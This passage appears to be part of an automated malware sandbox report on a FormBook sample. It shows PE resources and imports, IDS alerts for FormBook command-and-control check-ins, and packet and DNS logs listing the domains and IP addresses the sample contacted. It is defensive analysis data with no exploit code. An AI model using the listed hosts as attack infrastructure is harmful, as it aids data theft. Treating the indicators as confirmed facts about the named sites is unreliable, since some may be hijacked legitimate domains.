                                                                                                                      .rsrc0x3b0000x45100x4600False0.4218191964285714data5.130936129573036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                      RT_ICON0x3b2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/mEnglishUnited States
                                                                                                                      RT_ICON0x3d7e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/mEnglishUnited States
                                                                                                                      RT_ICON0x3e8880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/mEnglishUnited States
                                                                                                                      RT_DIALOG0x3ecf00x100dataEnglishUnited States
                                                                                                                      RT_DIALOG0x3edf00x11cdataEnglishUnited States
                                                                                                                      RT_DIALOG0x3ef100x60dataEnglishUnited States
                                                                                                                      RT_GROUP_ICON0x3ef700x30dataEnglishUnited States
                                                                                                                      RT_VERSION0x3efa00x22cdataEnglishUnited States
                                                                                                                      RT_MANIFEST0x3f1d00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Network Behavior

                                                                                                                      Snort IDS Alerts

                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                      192.168.2.3185.151.30.18149711802031453 03/20/23-09:09:32.876293TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.3185.151.30.181
                                                                                                                      192.168.2.3192.64.116.16249717802031449 03/20/23-09:09:54.051496TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.3192.64.116.162
                                                                                                                      192.168.2.35.181.216.14149705802031449 03/20/23-09:09:09.878629TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.35.181.216.141
                                                                                                                      192.168.2.3192.64.116.16249717802031412 03/20/23-09:09:54.051496TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.3192.64.116.162
                                                                                                                      192.168.2.35.181.216.14149705802031453 03/20/23-09:09:09.878629TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.35.181.216.141
                                                                                                                      192.168.2.3192.64.116.16249717802031453 03/20/23-09:09:54.051496TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.3192.64.116.162
                                                                                                                      192.168.2.3185.151.30.18149711802031449 03/20/23-09:09:32.876293TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.3185.151.30.181
                                                                                                                      192.168.2.38.8.8.851139532023883 03/20/23-09:09:48.362224UDP2023883ET DNS Query to a *.top domain - Likely Hostile5113953192.168.2.38.8.8.8
                                                                                                                      192.168.2.35.181.216.14149705802031412 03/20/23-09:09:09.878629TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970580192.168.2.35.181.216.141
                                                                                                                      192.168.2.3185.151.30.18149711802031412 03/20/23-09:09:32.876293TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.3185.151.30.181

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Mar 20, 2023 09:08:23.239229918 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.258771896 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.258922100 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.259864092 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.280504942 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.462835073 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466599941 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466635942 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.466769934 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.466814995 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.466965914 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.476100922 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.476188898 CET4969880192.168.2.3199.59.243.223
                                                                                                                      Mar 20, 2023 09:08:23.486416101 CET8049698199.59.243.223192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:33.718719006 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:33.860883951 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:33.861018896 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:33.861186028 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:34.004131079 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:34.004220963 CET8049700198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:34.004365921 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:35.370201111 CET4970080192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.387404919 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.529535055 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.529732943 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.530070066 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.673634052 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.673666954 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678245068 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678307056 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678327084 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678345919 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678364992 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678384066 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678401947 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678421021 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678453922 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678473949 CET8049701198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:36.678502083 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:36.678550959 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:38.041094065 CET4970180192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.057307005 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.198124886 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.198402882 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.198573112 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.338808060 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.338846922 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:39.338994026 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.339560032 CET4970280192.168.2.3198.58.118.167
                                                                                                                      Mar 20, 2023 09:08:39.479263067 CET8049702198.58.118.167192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:52.197664976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.183217049 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.350596905 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.350929976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.351131916 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.518073082 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518115997 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518137932 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518275976 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:55.518762112 CET80497035.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:55.518836021 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:56.855484962 CET4970380192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:57.871778011 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.037409067 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.037661076 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.038130045 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.202923059 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.202984095 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203006983 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203119993 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.203399897 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203422070 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.203469038 CET4970480192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:08:58.367841005 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:58.367882967 CET80497045.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:00.559386015 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:03.558839083 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:09.716959000 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:09.878328085 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:09.878494024 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:09.878628969 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:10.038577080 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:10.038641930 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:10.038702965 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:10.038727999 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:10.038892031 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:10.038979053 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:10.039194107 CET4970580192.168.2.35.181.216.141
                                                                                                                      Mar 20, 2023 09:09:10.199062109 CET80497055.181.216.141192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.096410036 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:15.129733086 CET8049706213.171.195.105192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.129988909 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:15.130350113 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:15.164252996 CET8049706213.171.195.105192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.164403915 CET8049706213.171.195.105192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.164463043 CET8049706213.171.195.105192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.164660931 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:16.639620066 CET4970680192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:17.654774904 CET4970780192.168.2.3213.171.195.105
                                                                                                                      Mar 20, 2023 09:09:17.688360929 CET8049707213.171.195.105192.168.2.3

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Mar 20, 2023 09:08:18.059130907 CET6178753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:18.108978987 CET53617878.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:23.120605946 CET5892153192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:23.235593081 CET53589218.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:33.538893938 CET4997753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET53499778.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:44.356928110 CET5784053192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:44.618321896 CET53578408.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:45.622361898 CET5799053192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:45.811009884 CET53579908.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:46.827991962 CET5238753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:46.985388994 CET53523878.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:08:52.008558989 CET5692453192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:08:52.196227074 CET53569248.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:15.063662052 CET6062553192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:09:15.094926119 CET53606258.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:27.620827913 CET4930253192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:09:27.751117945 CET53493028.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:38.002252102 CET5397553192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:09:38.020363092 CET53539758.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:09:48.362224102 CET5113953192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:09:48.472723007 CET53511398.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:00.005140066 CET5295553192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:00.160120964 CET53529558.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:01.176269054 CET6058253192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:01.385709047 CET53605828.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:02.394485950 CET5713453192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:02.523490906 CET53571348.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:07.544554949 CET6205053192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:07.567246914 CET53620508.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:08.603447914 CET5604253192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:08.626447916 CET53560428.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:09.648912907 CET5963653192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:09.669090033 CET53596368.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:14.745964050 CET5563853192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:14.768513918 CET53556388.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:25.792670965 CET5770453192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:25.829457998 CET53577048.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:36.036226034 CET6532053192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:36.065522909 CET53653208.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:46.233026028 CET6076753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:46.512599945 CET53607678.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:10:58.079703093 CET6510753192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:10:58.134869099 CET53651078.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:10.968102932 CET5384853192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:11:11.017399073 CET53538488.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:37.019893885 CET5757153192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:11:37.163110971 CET53575718.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:38.184684038 CET5869153192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:11:38.328841925 CET53586918.8.8.8192.168.2.3
                                                                                                                      Mar 20, 2023 09:11:39.347182989 CET5330553192.168.2.38.8.8.8
                                                                                                                      Mar 20, 2023 09:11:39.494823933 CET53533058.8.8.8192.168.2.3

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Mar 20, 2023 09:08:18.059130907 CET192.168.2.38.8.8.80x7c1dStandard query (0)www.themssterofssuepnse.restA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:23.120605946 CET192.168.2.38.8.8.80xa01dStandard query (0)www.hudsonandbailey.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.538893938 CET192.168.2.38.8.8.80xd7a5Standard query (0)www.virginhairweave.co.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:44.356928110 CET192.168.2.38.8.8.80x34e3Standard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:45.622361898 CET192.168.2.38.8.8.80x388cStandard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:46.827991962 CET192.168.2.38.8.8.80xb63fStandard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:52.008558989 CET192.168.2.38.8.8.80x96dcStandard query (0)www.dirdikyepedia.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:15.063662052 CET192.168.2.38.8.8.80xc039Standard query (0)www.g2fm.co.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:27.620827913 CET192.168.2.38.8.8.80x468dStandard query (0)www.mynichemarket.co.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:38.002252102 CET192.168.2.38.8.8.80x2560Standard query (0)www.landlotto.ruA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:48.362224102 CET192.168.2.38.8.8.80xc976Standard query (0)www.gorwly.topA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:00.005140066 CET192.168.2.38.8.8.80x627dStandard query (0)www.ketoibabal.cyouA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:01.176269054 CET192.168.2.38.8.8.80xbe46Standard query (0)www.ketoibabal.cyouA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:02.394485950 CET192.168.2.38.8.8.80x1805Standard query (0)www.ketoibabal.cyouA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:07.544554949 CET192.168.2.38.8.8.80x1492Standard query (0)www.thelastwill.netA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:08.603447914 CET192.168.2.38.8.8.80x442dStandard query (0)www.thelastwill.netA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:09.648912907 CET192.168.2.38.8.8.80x46d1Standard query (0)www.thelastwill.netA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:14.745964050 CET192.168.2.38.8.8.80x87ccStandard query (0)www.ty23vip.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:25.792670965 CET192.168.2.38.8.8.80xc5abStandard query (0)www.allison2patrick.onlineA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:36.036226034 CET192.168.2.38.8.8.80x5df2Standard query (0)www.glb-mobility.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:46.233026028 CET192.168.2.38.8.8.80x9aa8Standard query (0)www.fanversewallet.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:58.079703093 CET192.168.2.38.8.8.80x8e22Standard query (0)www.karlscurry.co.ukA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:10.968102932 CET192.168.2.38.8.8.80xd22Standard query (0)www.themssterofssuepnse.restA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:37.019893885 CET192.168.2.38.8.8.80x528Standard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:38.184684038 CET192.168.2.38.8.8.80xacb9Standard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:39.347182989 CET192.168.2.38.8.8.80x43adStandard query (0)www.brennmansoluciones.comA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Mar 20, 2023 09:08:18.108978987 CET8.8.8.8192.168.2.30x7c1dServer failure (2)www.themssterofssuepnse.restnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:23.235593081 CET8.8.8.8192.168.2.30xa01dNo error (0)www.hudsonandbailey.uk199.59.243.223A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:33.677284002 CET8.8.8.8192.168.2.30xd7a5No error (0)www.virginhairweave.co.uk45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:44.618321896 CET8.8.8.8192.168.2.30x34e3Server failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:45.811009884 CET8.8.8.8192.168.2.30x388cServer failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:46.985388994 CET8.8.8.8192.168.2.30xb63fServer failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:52.196227074 CET8.8.8.8192.168.2.30x96dcNo error (0)www.dirdikyepedia.comdirdikyepedia.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:08:52.196227074 CET8.8.8.8192.168.2.30x96dcNo error (0)dirdikyepedia.com5.181.216.141A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:15.094926119 CET8.8.8.8192.168.2.30xc039No error (0)www.g2fm.co.uk213.171.195.105A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:27.751117945 CET8.8.8.8192.168.2.30x468dNo error (0)www.mynichemarket.co.uk185.151.30.181A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:38.020363092 CET8.8.8.8192.168.2.30x2560No error (0)www.landlotto.ru109.70.26.37A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:38.020363092 CET8.8.8.8192.168.2.30x2560No error (0)www.landlotto.ru194.85.61.76A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:09:48.472723007 CET8.8.8.8192.168.2.30xc976No error (0)www.gorwly.top192.64.116.162A (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:10:00.160120964 CET8.8.8.8192.168.2.30x627dServer failure (2)www.ketoibabal.cyounonenoneA (IP address)IN (0x0001)false
